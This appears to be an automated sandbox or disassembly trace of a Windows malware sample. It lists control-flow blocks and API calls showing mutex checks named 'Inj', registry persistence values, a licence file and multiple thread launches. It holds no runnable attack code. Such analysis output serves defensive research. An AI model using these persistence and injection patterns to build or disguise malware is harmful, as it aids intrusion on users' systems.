??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 70->96 71->63 74 408fc1-408fc7 71->74 76 408fc9-408fe2 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 74->76 77 408feb-409008 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40b47f 74->77 76->63 80 408fe4-408fe9 call 4031f8 76->80 77->63 86 40900a call 4030ec 77->86 80->63 86->63 97 409314-409379 ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ * 2 call 40b692 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z 95->97 98 409156-409161 95->98 96->95 115 4090f1-409147 call 40180c call 412881 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 40180c ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 4135de ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 2 96->115 108 40937f-4093a5 call 40180c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi 97->108 100 409201-409208 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z 98->100 101 409167-4091ff call 40180c ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40180c ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40180c call 412881 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 40180c call 412881 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 40180c ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 407e37 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 2 98->101 105 40920e-4092c3 ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ ??2@YAPAXI@Z ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ wcscpy ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40b8f8 ??3@YAXPAX@Z call 40180c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40b708 100->105 101->105 132 4092c8-4092e4 call 40180c ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 105->132 121 4093a7-4093a9 108->121 122 4093ab-4093ad 108->122 115->95 127 4093b0-4093c0 call 413d3d CreateThread 121->127 128 4093c2-409419 call 40180c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z call 40180c call 412881 ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 122->128 129 4093af 122->129 127->128 156 409474-4094aa call 40180c call 412881 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 40180c ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 4135de 128->156 157 40941b-40946f call 40180c call 412881 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 40180c ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 4135de ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 128->157 129->127 132->108 146 4092ea-40930b call 40180c call 412795 call 409a2f 132->146 146->108 173 40930d 146->173 181 4094af-409525 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 2 call 40180c call 412881 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 2 156->181 184 409528-40957e ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ call 40180c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi call 40180c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 157->184 173->97 181->184 192 409580-409581 184->192 193 40959e-4095b2 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z call 405180 184->193 195 409583-40959c ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z call 405232 192->195 196 4095b7-4095cb call 40180c ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 192->196 193->196 195->196 201 409602-409616 call 40180c ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 196->201 202 4095cd-409600 ??2@YAPAXI@Z call 40180c ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ CreateThread 196->202 207 409618-40964c ??2@YAPAXI@Z call 40180c ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ CreateThread 201->207 208 40964e-409662 call 40180c ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 201->208 202->201 207->208 213 409664-4096bc call 40180c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40180c ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 41358b ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ CreateThread 208->213 214 4096be-4096d2 call 40180c ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 208->214 213->214 220 4096d4-40970b call 40180c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi call 40180c ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 407a0a 214->220 221 40970c-409732 call 412163 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 214->221 220->221 228 409734-409735 SetProcessDEPPolicy 221->228 229 409737-409749 CreateThread 221->229 228->229 232 409757-40975d 229->232 233 40974b-409755 CreateThread 229->233 235 40976b-409772 232->235 236 40975f-409769 CreateThread 232->236 233->232 239 409774-409775 235->239 240 4097bd-4097fa ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z call 41203b 235->240 236->235 241 409803 call 40c81c 239->241 242 40977b-4097bb ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z call 41203b 239->242 247 4097fd ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 240->247 248 409808-40980b ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 241->248 242->247 247->241 248->50
                                  APIs
                                    • Part of subcall function 00409823: malloc.MSVCRT ref: 00409846
                                    • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00409872
                                    • Part of subcall function 00409823: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040987E
                                    • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409887
                                    • Part of subcall function 00409823: malloc.MSVCRT ref: 00409898
                                    • Part of subcall function 00409823: free.MSVCRT(?,?,?,00000000,00408CAD,00000000), ref: 004098E3
                                    • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098F1
                                    • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004098FA
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BC80,?,?,00000000), ref: 00408CB7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00408CC6
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(licence_code.txt,00000012,00000001,00000000), ref: 00408D31
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034), ref: 00408D42
                                  • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,00000000), ref: 00408D50
                                  • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D5E
                                  • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D6A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408D73
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,00000000), ref: 00408D8C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(004140D8,Software\,00000000,0000000E,00415774), ref: 00408DB4
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0000000E,00415774), ref: 00408DC1
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,0000000E,00415774), ref: 00408DD1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DDA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DE3
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000032,00000000,?,?,?,?,0000000E,00415774), ref: 00408DF5
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000033,00000000,?,?,?,?,0000000E,00415774), ref: 00408E11
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,004140D8,?,?,?,?,0000000E,00415774), ref: 00408E37
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408E56
                                  • OpenMutexA.KERNEL32 ref: 00408E80
                                  • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,0000000E,00415774), ref: 00408E93
                                  • CloseHandle.KERNEL32(004140D8,?,?,?,?,0000000E,00415774), ref: 00408E9C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,0000000E,00415774), ref: 00408EAD
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408ECC
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000E,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EEF
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EFA
                                  • CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F04
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F0A
                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\logagent.exe,00000104,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F2F
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F61
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F6A
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60( (32 bit),?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F89
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000002E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FAF
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00415F98,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00408FD4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FF2
                                    • Part of subcall function 0040B47F: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,00000000,80000001,?,00407A4E,80000001,00000000), ref: 0040B495
                                    • Part of subcall function 0040B47F: RegQueryValueExA.ADVAPI32(00000000,80000001,00000000,00000000,00000000,00000000,0041BA38,?,00407A4E,80000001,00000000), ref: 0040B4AA
                                    • Part of subcall function 0040B47F: RegCloseKey.ADVAPI32(00000000,?,00407A4E,80000001,00000000), ref: 0040B4B5
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000027,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040901A
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000B,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409044
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040904D
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040905E
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409079
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409094
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090AF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090D4
                                  • wcslen.MSVCRT ref: 004090DB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090E7
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409108
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040911A
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409135
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040913E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409147
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409172
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409189
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091AC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091CA
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091DC
                                    • Part of subcall function 00407E37: wcslen.MSVCRT ref: 00407E46
                                    • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                    • Part of subcall function 00407E37: CreateDirectoryW.KERNEL32(00000000), ref: 00407E64
                                    • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                    • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
                                    • Part of subcall function 00407E37: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                    • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                    • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                    • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                    • Part of subcall function 00407E37: wcscmp.MSVCRT ref: 00407EE0
                                    • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F9
                                  • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409210
                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040921B
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409226
                                  • wcscpy.MSVCRT ref: 00409230
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040923F
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040924B
                                  • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409254
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,004140D8,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040926C
                                    • Part of subcall function 0040B8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                    • Part of subcall function 0040B8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                  • ??3@YAXPAX@Z.MSVCRT ref: 00409280
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034,?), ref: 0040929E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004092A7
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(licence), ref: 004092B7
                                    • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                    • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                    • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                    • Part of subcall function 0040B708: RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                    • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                    • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000000D,00415B14), ref: 004092DA
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000028), ref: 0040938A
                                  • atoi.MSVCRT ref: 00409391
                                  • CreateThread.KERNEL32 ref: 004093C0
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000F), ref: 004093CD
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004093E1
